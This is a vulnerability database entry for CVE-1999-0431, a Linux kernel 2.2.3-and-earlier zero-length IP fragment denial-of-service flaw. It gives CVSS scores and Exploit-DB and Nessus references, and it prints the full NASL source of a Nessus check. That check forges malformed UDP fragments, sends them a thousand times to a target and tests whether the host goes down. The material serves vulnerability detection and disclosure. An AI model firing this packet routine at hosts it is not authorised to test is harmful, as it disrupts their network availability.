Vulnerabilities > CVE-1999-0431 - Unspecified vulnerability in Linux Kernel

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
linux
nessus
exploit available

Summary

Linux 2.2.3 and earlier allow a remote attacker to perform an IP fragmentation attack, causing a denial of service.

Vulnerable Configurations

Part Description Count
OS
Linux
190

Exploit-Db

descriptionLinux kernel 2.1.89/2.2.x Zero-Length Fragment Vulnerability. CVE-1999-0431. Dos exploit for linux platform
idEDB-ID:20566
last seen2016-02-02
modified1997-12-08
published1997-12-08
reporterJohn McDonald
sourcehttps://www.exploit-db.com/download/20566/
titleLinux kernel 2.1.89/2.2.x Zero-Length Fragment Vulnerability

Nessus

NASL familyDenial of Service
NASL idLINUX_ZERO_LEN_FRAGMENT.NASL
descriptionThe remote host appears to be using a Linux kernel that contains a flaw in its IP fragment handling code. By sending a series of packets with 0 length fragments, an unauthenticated attacker may be able to disable the remote host
last seen2020-06-01
modified2020-06-02
plugin id10134
published1999-06-22
reporterThis script is Copyright (C) 1999-2019 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10134
titleLinux 2.1.89 - 2.2.3 IP Fragmenting Functionality 0 Length Fragment Handling Remote DoS
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(10134);
 script_version("1.42");
 script_cvs_date("Date: 2019/03/06 18:38:55");

 script_cve_id("CVE-1999-0431");
 script_bugtraq_id(2247);

 script_name(english:"Linux 2.1.89 - 2.2.3 IP Fragmenting Functionality 0 Length Fragment Handling Remote DoS");
 script_summary(english:"Disables networking connectivity on the remote host");

 script_set_attribute(attribute:"synopsis", value:"The remote host is prone to a denial of service attack.");
 script_set_attribute(attribute:"description", value:
"The remote host appears to be using a Linux kernel that contains a
flaw in its IP fragment handling code. By sending a series of packets
with 0 length fragments, an unauthenticated attacker may be able to
disable the remote host's IP connectivity.");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Mar/149");
 script_set_attribute(attribute:"solution", value:"Upgrade to Linux kernel version 2.2.4 or later.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"1999/03/24");
 script_set_attribute(attribute:"plugin_publication_date", value:"1999/06/22");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/o:linux:kernel");
 script_end_attributes();

 script_category(ACT_KILL_HOST);

 script_copyright(english:"This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.");
 script_family(english:"Denial of Service");

 script_dependencies("os_fingerprint.nasl");
 script_require_keys("Settings/ParanoidReport");

 exit(0);
}

include("audit.inc");
include("global_settings.inc");

if ( TARGET_IS_IPV6 ) exit(0);

os = get_kb_item("Host/OS");
if ( os && "Linux" >!< os ) exit(0);

if (report_paranoia < 2) audit(AUDIT_PARANOID);

start_denial();

# source port
s = 56;
# dest port
d = 16384;

ip = forge_ip_packet(ip_v : 4,
                     ip_hl: 5,
                     ip_tos:0,
                     ip_id : 0x1234,
                     ip_ttl: 0x40,
                     ip_p  : IPPROTO_UDP,
                     ip_len:  20 + 32,
		     ip_src: compat::this_host(),
                     ip_off: IP_MF);
udp1 = forge_udp_packet(ip:ip, uh_sport:s, uh_dport:d, uh_ulen:56);

ip = set_ip_elements(ip : ip, ip_len : 20, ip_off : IP_MF);
udp2 = forge_udp_packet(ip:ip, uh_sport:s,uh_dport:d, uh_ulen:56,
                        update_ip_len:FALSE);
ip = set_ip_elements(ip : ip, ip_len:32 + 20,ip_off:4);
udp3 = forge_udp_packet(ip:ip, uh_sport:s,uh_dport:d,uh_ulen:56);

# don't read the host answers
send_packet(udp1,udp2, udp3, pcap_active:FALSE) x 1000;

sleep(30);

alive = end_denial();

if(!alive){
  set_kb_item(name:"Host/dead", value:TRUE);
  security_warning(port:0, protocol:"udp");
}